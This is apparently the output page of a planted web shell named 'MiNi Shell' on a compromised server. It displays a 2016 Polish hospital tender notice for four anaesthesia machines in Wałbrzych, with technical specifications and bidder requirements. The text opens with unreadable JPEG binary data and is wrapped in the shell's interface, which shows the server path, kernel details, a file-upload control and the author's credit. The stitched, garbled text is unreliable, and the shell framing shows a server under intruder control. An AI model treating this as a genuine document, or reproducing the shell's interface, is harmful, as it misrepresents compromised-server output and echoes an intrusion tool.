JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160401/33467-N-2016.html

<p class="kh_header"><b>Wałbrzych: Dostawa czterech aparatów do znieczuleń z monitorowaniem.</b><br>
<b>Numer ogłoszenia: 33467 - 2016; data zamieszczenia: 01.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Szpital im. dr Alfreda Sokołowskiego , ul. Sokołowskiego 4, 58-309 Wałbrzych, woj. dolnośląskie, tel. 074 6489742, faks 074 6489746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdrowie.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa czterech aparatów do znieczuleń z monitorowaniem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa czterech aparatów do znieczuleń z monitorowaniem.

Parametry techniczne
Wymiary zewnętrzne (wys. x szer. x gł.)	
Masa max. 120 kg	
Zasilanie AC 230 V 50 Hz	
Blat do pisania	
Szuflada na drobne akcesoria	
Uchwyt awaryjny butli tlenowej i N2O	
Dodatkowe gniazda elektryczne 230 V (minimum 3 gniazda)	
Zasilanie gazowe (N2O, O2, powietrze) z sieci centralnej		
Awaryjne zasilanie gazowe z butli O2 i N2O	
Awaryjne zasilanie elektryczne całego systemu minimum 30 minut	
Reduktor do butli O2 i N2O ze złączeniami gwintowymi zgodnymi z PN wyposażone w przyłącze do aparatu	
Ssak indżektorowy, napędzany tlenem z sieci centralnej z regulacją siły ssania, zbiornikiem na wydzieliny oraz zapasowy wymiennik na wydzieliny		
Uchwyt do przynajmniej dwóch parowników mocowanych jednocześnie; system montażu kompatybilny z posiadanym - Dräger	
System dystrybucji gazów
Precyzyjne, elektroniczne przepływomierze dla tlenu, podtlenku azotu i powietrza z możliwością zapamiętania przez aparat lub eksportu danych dotyczących przepływu gazów w trakcie znieczulania do komputera	-  opis	
Elektroniczny mieszalnik świeżych gazów zapewniający stałe stężenie tlenu przy zmianie wielkości przepływu świeżych gazów	
System automatycznego utrzymywania minimalnego stężenia tlenu w mieszaninie oddechowej na poziomie 25%	 opis	
Kalibracja przepływomierzy dostosowana do znieczulania z niskimi i minimalnymi przepływami minimalny przepływ świeżych gazów 500 ml/min lub niższy	
Układ oddechowy
Kompaktowy układ oddechowy okrężny do wentylacji dorosłych o niskiej podatności	
Układ oddechowy o prostej budowie, małej ilości części,
łatwy do wymiany i sterylizacji	
Obejście tlenowe o dużej wydajności	
Regulowana ciśnieniowa zastawka bezpieczeństwa	
Pochłaniacz dwutlenku węgla o obudowie przeziernej i pojemności minimum 1.5 L	
Eliminacja gazów anestetycznych poza salę operacyjną	
Wykres słupkowy przedstawiający zużycie świeżych gazów w trakcie znieczulania - tzw. ekonometr znieczulenia	
Respirator o sterowaniu elektronicznym, napęd respiratora nie zużywający gazów medycznych (elektryczny)	
Tryby wentylacji
Tryb ręczny	
Oddech spontaniczny	
Wentylacja kontrolowana objętościowo przy dodatnim ciśnieniu w układzie pacjenta	
SIMV synchronizowana przerywana wentylacja wymuszona	
Wentylacja kontrolowana objętością	
Wentylacja kontrolowana ciśnieniem	
Tryb PS (Pressure Support)	
Możliwość rozbudowy o tryb z gwarantowaną objętością (typu Auto Flow)	
Tryb do współpracy z maszyną płuco-serce typu Cardiac Bypass Mode	
Regulacje
Reg. stosunku wdechu do wydechu: minimum 4:1 do 1:4 (podać zakres)	
Reg. częstości oddechu minimum od 3 do 100 l/min(podać zakres)	
Reg. objętości oddechowej minimum od 5 do 1400 ml(podać zakres)	
PEEP - dodatnie ciśnienie końcowo wydechowe w zakresie minimum od 0 do 20 cmH2O (podać zakres)	
Regulacja ciśnienia wdechu przy PCV minimum: od 10 do 60  hPa ( podać zakres)	
Regulacja Plateau wdechu w zakresie minimum od 5 do 50 % czasu wdechu		
Regulacja czułości wyzwalacza przepływowego przy SIMV w zakresie od 0,3 do 15 l.-min	
Regulacja czasu narastania przepływu dla oddechów ciśnieniowo kontrolowanych i wspomaganych lub automatyczna regulacja zakresu narastania przepływu dla oddechów ciśnieniowo kontrolowanych i wspomaganych- opisać	-opis	
Alarmy
Niskiej objętości minutowej		
Alarm minimalnego i maksymalnego ciśnienia wdechowego		
Alarm braku zasilania w energię elektryczną	
Alarm braku zasilania w gazy	
Alarm Apnea ciśnienia, objętości CO2		
Możliwość automatycznego ustawienia granic alarmowych po ustabilizowaniu wentylacji lub możliwość szybkiego ustawiania granic alarmowych	
Pomiar i obrazowanie
Stężenia tlenu w gazach oddechowych	
Pomiar objętości oddechu Vt	
Pomiar objętości minutowej MV	
Pomiar objętości minutowej MVspont	
Pomiar częstotliwości oddechowej f	
Ciśnienia szczytowego	
Ciśnienia średniego	
Ciśnienia Plateau	
Ciśnienia PEEP	
Częstości oddychania	
Analiza MAC z uwzględnieniem wieku pacjenta		
Dziennik zdarzeń - rejestrowanie przez aparat trybu wentylacji, ciśnienia szczytowego, MV, stężenia O2, etCO2, anestetyków, MAC do protokołowania znieczulania	
Prezentacja mini trendów Cpat, MVCO2 (emisja dwutlenku węgla)	
Kapnografia i kapnometria	
Stężenia lotnych anestetyków z automatyczną detekcją zastosowanego środka	
Pomiar ciśnienia tlenu w butlach awaryjnych na panelu przednim aparatu	
Automatyczne skalkulowanie parametrów wentylacji po wprowadzeniu wagi pacjenta	a pętli ciśnienie- objętość, przepływ- objętość	
Zapamiętywanie pętli oddechowej (referencyjnej)	
Przeentacja pętli referencyjnej, jej parametrów, i aktualnie kreślonej: VT, Pmax, Cpat na ekranie respiratora	
Inne
Komunikacja z aparatem w języku polskim	
Czujnik paramagnetyczny do pomiaru tlenu (nie galwaniczny); nie dopuszcza się pomiaru przez monitor funkcji życiowych lub jego moduł	
Wyposażenie aparatu: układ oddechowy jednorazowy dla dorosłych i dzieci - min. 25 szt; linie próbkujące do pomiaru gazów (min. 20 szt.); pułapka wodna (min. 12 szt.),; wapno z indykatorem (min. 2 szt. o poj. 5 L na 1 aparat), dodatkowy przepływomierz do tlenu przy aparacie; dreny do O2, N2O i powietrza z wtykami typu AGA o dł. min. 5 m.	
Dostawca zapewni wsparcie przy instalacji i konfiguracji sprzętu oraz przeszkolenie personelu lekarskiego oraz pielęgniarskiego umożliwiające bezpieczne korzystanie z urządzenia	
Wymagania ogólne monitora anestezjologicznego
System monitorowania zbudowany jest w oparciu o stacjonarne monitory pacjenta z ekranem  o przekątnej przynajmniej 15.	
Konstrukcja monitorów pacjenta bez wentylatorów chłodzących w celu ograniczenia hałasu i gromadzenia zanieczyszczeń. Dotyczy wszystkich elementów systemu monitorowania zamocowanych na stanowisku pacjenta.	
Podać	
Menu ekranowe i komunikaty występujące w oferowanym systemie muszą być w języku Polskim	 Podać	
Monitory wyposażone w układy alarmowe wszystkich monitorowanych parametrów,
umożliwiające ręczne i automatyczne ustawianie granic alarmowych oraz konfigurację takich parametrów, jak włączanie i wyłączanie alarmów poszczególnych parametrów, sposób archiwizacji alarmów poszczególnych parametrów (zapamiętywanie zdarzeń)	
Możliwość dopasowania do potrzeb użytkownika, zapamiętania i łatwego przywołania przynajmniej 8 różnych zestawów konfiguracji monitora, obejmujących wszystkie bieżące ustawienia monitora, takie jak układ ekranu, konfiguracja alarmów, głośność  sygnalizacji dźwiękowej itp. dla różnych kategorii wiekowych	
Podłączanie -odłączenie modułów pomiarowych przez użytkownika bez zakłócania pracy monitora, z automatyczną zmianą układu ekranu związaną z pojawieniem się lub usunięciem podłączanych/odłączanych parametrów. Wszystkie monitory  oferowanego systemu monitorowania wykorzystują te same moduły pomiarowe i akcesoria	

Monitory są przystosowane do wyświetlania danych z oferowanych aparatów do znieczulania, przynajmniej wartości liczbowych. Dane te są zapamiętywane w postaci trendów, które można wyświetlić razem z trendami parametrów hemodynamicznych na ekranie monitora lub w systemie centralnego monitorowania	

Monitor pacjenta, przystosowany do monitorowania wszystkich grup wiekowych, z kolorowym ekranem o przekątnej przynajmniej 15, ze sterowaniem dotykowym, zapewniającym prezentację monitorowanych parametrów życiowych pacjenta, sterowanie pomiarami (takie jak ustawianie granic alarmowych, uruchamianie pomiarów, wybór sposobu wyświetlania).
Monitor musi wyświetlać przynajmniej 3 przebiegów dynamicznych		
Mocowanie monitora do aparatu w sposób umożliwiający obrót i zmianę nachylenia ekranu. System mocowania musi być dopuszczony do takiego zastosowania przez producenta aparatu do znieczulania,	
System monitorowania umożliwia nieprzerwany zapis wszystkich wymaganych parametrów pacjenta na stanowisku , łącznie przynajmniej z ostatnich 24 godzin. Minimalne wymagania dotyczące ciągłości zapisów są następujące:
ciągłość zapisów trendów przed, w czasie i po transporcie, zdarzenia alarmowe z odcinkami krzywych dynamicznych występujące przed, w czasie i po transporcie, z zachowaniem ich chronologii	
Pomiar odedechu z elektrod EKG	

Pomiar saturacji (SpO2)	TAK	
System pomiaru  dokonywany algorytmem odpornym na zakłócenia ruchowe i niską perfuzję - typu Masiomo LNCS	
Monitorowanie  12 odprowadzeń z co najmniej 5 elektrod o jakości diagnostycznej		
Wieloodprowadzeniowa analiza EKG do zliczania częstości akcji serca i do analizy arytmii, jednocześnie przynajmniej w 2 odprowadzeniach	
Analiza ST jednocześnie we wszystkich monitorowanych odprowadzeniach EKG  w zakresie min. -+15mm	
Nieinwazyjny pomiar ciśnienia	
Metoda oscylometryczna, pomiar ręczny i automatyczny		
W komplecie przewód i zestaw mankietów dla dorosłych - min. cztery rozmiary i mankiet na udo oraz dla dzieci powyżej 1,5 roku życia- min. dwa. Mankiety pomiarowe bez lateksu	
Prezentacja wartości skurczowej, rozkurczowej i średniej	
Pomiar temperatury	
Przynajmniej 2 tory pomiarowe. Wyświetlanie temperatury i różnicy temperatury.	
Czujniki jednorazowe, dedykowane do stosowania z oferowanymi
monitorami, do zastosowań u pacjentów o wysokim ryzyku zakażeń - 10 szt.	Inwazyjny pomiar ciśnienia	
Przynajmniej 2 tory pomiarowe. Możliwość pomiaru i wpisania nazw różnych ciśnień - przygotowanie pod przetwornik Argon	
Pomiar zwiotczenia mięśni	
Pomiar zwiotczenia mięśniowego przy pomocy oddzielnego monitora lub modułu monitora podłączanego do i odłączanego od oferowanego systemu wraz z własnym zasilaniem awaryjnym, przekazującego wszystkie zmierzone parametry NMT do oferowanego systemu	
Wyposażenie i Inne	
Akcesoria:
Przewód EKG do 3 elektrod min. 1szt.
Czujnik do saturacji wielorazowy min.2 szt. na palec
Czujnik temperatury skóry min. 1 szt.
Zestaw przewodów do podłączenia akcesoriów niezbędnych do wykonania pomiaru przewodnictwa nerwowo mięśniowego  min.1 zestaw.	
Możliwość rozwinięcia w przyszłości o przesyłanie danych z aparatu do znieczulania i kardiomonitora do systemu szpitalnego; monitor gotowy do rozwinięcia w przyszłości o opcję elektronicznej karty pacjenta.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.21.00-4, 33.17.21.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu: 
- 10 500,00 zł (słownie: dziesięć tysięcy pięćset zł).

DATĄ UZNANIA WPŁATY  BĘDZIE DATA WPŁYWU NA KONTO ZAMAWIAJĄCEGO.
Potwierdzenie wniesienia wadium należy dołączyć do oferty. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego do oferty przetargowej oświadczenia oraz wymaganych dokumentów tj. 
1) posiadanie aktualnego odpisu z właściwego rejestru - na podstawie załączonego aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia  w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;
2) posiadanie aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego że Wykonawca nie zalega z uiszczaniem podatków - na podstawie aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3) posiadanie aktualnego zaświadczenia właściwego oddziału ZUS lub KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne - na podstawie aktualnego zaświadczenia właściwego oddziału ZUS lub KRUS potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego do oferty przetargowej oświadczenia oraz wymaganych dokumentów tj. :
- 1)	posiadanie doświadczenia w zakresie świadczenia dostaw - na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Zał. Nr 1 do SIWZ (opis przedmiotu zamówienia) oraz Wzór oferty- Zał.  nr 2 do SIWZ 
Dowód wniesienia lub ustanowienia wadium .
Oświadczenie Wykonawcy, iż oferowany przedmiot zamówienia  jest dopuszczony do obrotu na terenie RP zgodnie z  Ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107 poz. 679).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin gwarancji przedmiotu zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdrowie.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, Dział Zamówień Publicznych, ul. Sokołowskiego 4, 58-309 Wałbrzych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2016 godzina 08:00, miejsce: Siedziba Zamawiającego, Dział Zamówień Publicznych, ul. Sokołowskiego 4, 58-309 Wałbrzych..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com